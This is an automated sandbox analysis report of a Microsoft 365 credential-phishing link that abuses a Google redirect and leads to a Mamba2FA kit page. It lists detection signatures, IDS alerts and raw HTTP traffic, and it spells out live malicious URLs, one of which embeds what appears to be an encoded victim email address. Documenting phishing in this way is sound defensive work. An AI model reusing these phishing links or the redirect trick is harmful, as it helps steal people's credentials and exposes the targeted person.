Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20

Overview

General Information

Sample URL:https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn
Analysis ID:1542728
Infos:

Detection

HTMLPhisher, Mamba2FA
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
Yara detected Mamba 2FA PaaS
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid 'forgot password' link found
Invalid T&C link found
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 1012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2004,i,6732713318818398282,15989953615233870441,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6296 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"sv": "o365_1_nom", "rand": "VE1najQ=", "uid": "USER09102024U44100921"}
SourceRuleDescriptionAuthorStrings
2.1.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
    2.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      2.2.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
        2.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-26T08:48:45.776561+020020563161Successful Credential Theft Detected192.168.2.449745192.185.209.0443TCP
          2024-10-26T08:48:47.350342+020020563161Successful Credential Theft Detected192.168.2.449747192.185.209.0443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-26T08:48:44.311293+020020566432Possible Social Engineering Attempted192.168.2.449742192.185.209.0443TCP
          2024-10-26T08:49:51.364228+020020566432Possible Social Engineering Attempted192.168.2.449934192.185.209.0443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
          Source: 2.1.pages.csvMalware Configuration Extractor: Mamba2FA {"sv": "o365_1_nom", "rand": "VE1najQ=", "uid": "USER09102024U44100921"}

          Phishing

          barindex
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20LLM: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'rieg.riegriegrieg.com' does not match the legitimate domain 'microsoft.com'., The domain 'riegriegrieg.com' does not have any known association with Microsoft., The URL contains repeated patterns and does not resemble any known Microsoft subdomains or services., The presence of a CAPTCHA input field ('I'm not a robot') is common in phishing sites to bypass automated detection. DOM: 2.2.pages.csv
          Source: Yara matchFile source: 2.1.pages.csv, type: HTML
          Source: Yara matchFile source: 2.2.pages.csv, type: HTML
          Source: Yara matchFile source: 2.1.pages.csv, type: HTML
          Source: Yara matchFile source: 2.2.pages.csv, type: HTML
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20Matcher: Found strong image similarity, brand: MICROSOFT
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20Matcher: Template: microsoft matched
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: Number of links: 0
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: Title: Authenticating ... does not match URL
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: Invalid link: Forgot password?
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: Invalid link: Terms of use
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: Invalid link: Privacy & cookies
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: Invalid link: Terms of use
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: Invalid link: Privacy & cookies
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: <input type="password" .../> found
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: No favicon
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: No favicon
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: No <meta name="author".. found
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: No <meta name="author".. found
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: No <meta name="copyright".. found
          Source: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20HTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49777 version: TLS 1.2

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.4:49745 -> 192.185.209.0:443
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.4:49747 -> 192.185.209.0:443
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.co.uk to http://taxigiarebienhoa.vn/nini/ybmex/captcha/z3vsyw1yyxn1bc5jagvwdxdhbgfay2v2ywxvz2lzdgljcy5jb20
          Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.4:49742 -> 192.185.209.0:443
          Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.4:49934 -> 192.185.209.0:443
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20 HTTP/1.1Host: www.google.co.ukConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20 HTTP/1.1Host: www.google.co.ukConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=JOKiZQSKf-RapXvTMPj2l6Y3Ppx0xRRhVER9I5yYXcpulQgNPnRIqifCOv4URqxjPp9llJLlGn_8esOKptBIH5UGUMEferI3MRY95BGtQ3YbjU_uvfTeTDq4lZRxlAgZe350GiO3PlQ-xsJQ5a8eLhqBXr4pWLYvQq3XLjsIGpMmw6OBOUV0tysVo1OE-871
          Source: global trafficHTTP traffic detected: GET /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N HTTP/1.1Host: rieg.riegriegrieg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://taxigiarebienhoa.vn/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /n/jsnom.js HTTP/1.1Host: rieg.riegriegrieg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rieg.riegriegrieg.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://rieg.riegriegrieg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /n/jsnom.js HTTP/1.1Host: rieg.riegriegrieg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: rieg.riegriegrieg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rieg.riegriegrieg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rieg.riegriegrieg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rieg.riegriegrieg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rieg.riegriegrieg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rieg.riegriegrieg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rieg.riegriegrieg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rieg.riegriegrieg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
